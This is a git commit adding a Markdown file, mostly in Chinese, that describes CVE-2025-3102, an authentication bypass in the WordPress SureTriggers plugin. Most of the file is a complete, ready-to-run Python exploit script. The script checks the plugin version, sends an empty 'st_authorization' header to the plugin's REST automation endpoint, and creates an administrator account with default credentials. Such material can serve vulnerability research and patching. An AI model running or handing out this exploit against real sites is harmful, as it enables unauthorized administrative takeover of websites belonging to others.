Create WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md

2025-06-20 09:51:11 +00:00 · 2025-04-21 10:50:11 +08:00 · 2025-04-21 10:50:11 +08:00 · 534388baa8
commit 534388baa8
parent f56d31e15b
1 changed files with 140 additions and 0 deletions
--- a/Plugin存在身份验证绕过漏洞(CVE-2025-3102).md
+++ b/Plugin存在身份验证绕过漏洞(CVE-2025-3102).md
@ -0,0 +1,140 @@
+## WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102)
+
+WordPress 的一体化自动化平台插件存在身份验证绕过漏洞，导致创建管理员帐户。该漏洞是由于在 1.0.78 及之前的所有版本中，“autheticate_user”函数中“secret_key”值的空值检查缺失所致。
+这使得未经身份验证的攻击者能够在安装并激活该插件但未配置 API 密钥的情况下，在目标网站上创建管理员帐户。
+
+
+## 漏洞利用python脚本
+```python
+import argparse
+import requests
+import json
+import time
+import re
+
+
+requests.packages.urllib3.disable_warnings()
+
+
+def display_banner():
+    banner = """
+ @@@@@@@  @@@  @@@  @@@@@@@@              @@@@@@    @@@@@@@@    @@@@@@   @@@@@@@             @@@@@@     @@@   @@@@@@@@    @@@@@@   
+@@@@@@@@  @@@  @@@  @@@@@@@@             @@@@@@@@  @@@@@@@@@@  @@@@@@@@  @@@@@@@             @@@@@@@   @@@@  @@@@@@@@@@  @@@@@@@@  
+!@@       @@!  @@@  @@!                       @@@  @@!   @@@@       @@@  !@@                     @@@  @@@!!  @@!   @@@@       @@@  
+!@!       !@!  @!@  !@!                      @!@   !@!  @!@!@      @!@   !@!                     @!@    !@!  !@!  @!@!@      @!@   
+!@!       @!@  !@!  @!!!:!    @!@!@!@!@     !!@    @!@ @! !@!     !!@    !!@@!!   @!@!@!@!@  @!@!!@     @!@  @!@ @! !@!     !!@    
+!!!       !@!  !!!  !!!!!:    !!!@!@!!!    !!:     !@!!!  !!!    !!:     @!!@!!!  !!!@!@!!!  !!@!@!     !@!  !@!!!  !!!    !!:     
+:!!       :!:  !!:  !!:                   !:!      !!:!   !!!   !:!          !:!                 !!:    !!:  !!:!   !!!   !:!      
+:!:        ::!!:!   :!:                  :!:       :!:    !:!  :!:           !:!                 :!:    :!:  :!:    !:!  :!:       
+ ::: :::    ::::     :: ::::             :: :::::  ::::::: ::  :: :::::  :::: ::             :: ::::    :::  ::::::: ::  :: :::::  
+ :: :: :     :      : :: ::              :: : :::   : : :  :   :: : :::  :: : :               : : :      ::   : : :  :   :: : :::  
+                                      Exploit By: Nxploited ( Khaled Alenazi )
+"""
+    print(banner)
+
+
+def fetch_plugin_version(target_url):
+    try:
+        readme_url = f"{target_url.rstrip('/')}/wp-content/plugins/suretriggers/readme.txt"
+        response = requests.get(readme_url, timeout=10, verify=False)
+        if response.status_code == 200:
+            match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text)
+            if match:
+                return match.group(1)
+        return None
+    except requests.RequestException as e:
+        print(f"[!] Error fetching plugin version: {e}")
+        return None
+
+
+def is_version_vulnerable(version):
+    try:
+        version_parts = list(map(int, version.split(".")))
+        return version_parts <= [1, 0, 78]
+    except ValueError:
+        print("[!] Error parsing version.")
+        return False
+
+
+def prepare_headers():
+    return {
+        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
+        "Content-Type": "application/json",
+        "st_authorization": ""
+    }
+
+
+def build_payload(email, username, password):
+    return {
+        "integration": "WordPress",
+        "type_event": "create_user_if_not_exists",
+        "selected_options": {
+            "user_email": email,
+            "user_name": username,
+            "password": password
+        },
+        "fields": [],
+        "context": {}
+    }
+
+
+def send_exploit_request(endpoint, headers, payload):
+    try:
+        response = requests.post(endpoint, headers=headers, json=payload, timeout=15, verify=False)
+        return response
+    except requests.RequestException as e:
+        print(f"[-] Exploit request failed: {e}")
+        return None
+
+
+def handle_response(response, username, password):
+    if not response:
+        print("[-] No response received.")
+        return
+    try:
+        response_data = response.json()
+        if response_data.get("success"):
+            print("[+] Exploit successful!")
+            print(f"[+] Credentials: {username}:{password}")
+        else:
+            print("[-] Exploit failed. Response indicated failure.")
+    except json.JSONDecodeError:
+        print("[-] Failed to parse JSON response.")
+
+
+def run_exploit(target_url, email, username, password):
+    print("[*] Fetching plugin version...")
+    version = fetch_plugin_version(target_url)
+    if version:
+        print(f"[+] Plugin version: {version}")
+        if is_version_vulnerable(version):
+            print("[+] Vulnerable version detected. Proceeding with exploit...")
+        else:
+            print("[-] Target version is not vulnerable. Attempting exploit anyway...")
+    else:
+        print("[-] Could not determine plugin version. Proceeding without version verification.")
+
+    headers = prepare_headers()
+    payload = build_payload(email, username, password)
+    endpoint = f"{target_url.rstrip('/')}/wp-json/sure-triggers/v1/automation/action"
+    response = send_exploit_request(endpoint, headers, payload)
+    handle_response(response, username, password)
+
+
+def main():
+    display_banner()
+    parser = argparse.ArgumentParser(description="SureTriggers <= 1.0.78 - Authorization Bypass # By: Nxploited | Khaled Alenazi")
+    parser.add_argument("-u", "--url", required=True, help="Target WordPress base URL")
+    parser.add_argument("-nmail", "--newmail", default="NxploitBot@gmail.com", help="Email to register")
+    parser.add_argument("-nu", "--newuser", default="Nxploited", help="Username to register")
+    parser.add_argument("-np", "--newpassword", default="nxploit123", help="Password for the new user")
+    args = parser.parse_args()
+
+    run_exploit(args.url, args.newmail, args.newuser, args.newpassword)
+
+
+if __name__ == "__main__":
+    main()
+```
+
+<原文><https://github.com/Nxploited/CVE-2025-3102>